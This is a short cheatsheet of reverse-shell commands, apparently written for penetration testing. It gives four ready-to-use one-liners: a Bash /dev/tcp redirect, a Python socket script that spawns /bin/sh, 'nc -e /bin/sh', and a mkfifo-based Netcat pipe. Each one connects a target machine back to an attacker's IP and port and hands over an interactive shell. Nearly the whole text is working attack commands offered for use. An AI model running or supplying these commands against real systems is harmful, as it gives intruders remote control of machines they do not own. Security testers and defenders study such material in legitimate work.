Cheatsheets

Cheatsheet: Reverse Shells

Bash

When we don’t have any other third party tool to get a reverse shell back, we can always redirect the Bash into our host using the following command.

bash -i >& /dev/tcp/[Your IP]/[Your Port] 0>&1

Python

When we want to get a reverse shell on Linux, we can do it by abusing the interpreters which come with the Operating System, by default. For example, we can use the following command and force the Python interpreter to give us back a reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[Your IP]",[Your Port]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Netcat

If we cannot access any interpreters, we can search for other programs which can give us back a reverse shell. Netcat is one of them. Using the -e flag, netcat initiates a connection with the remote host and pipes the traffic to /bin/sh.

nc -e /bin/sh [Your IP] [Your Port]

Old Netcat

If the above netcat technique does not work, then the host might have an older version of netcat. In that case, you can use the following command to get a reverse shell back.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Your IP] [Your Port] >/tmp/f

References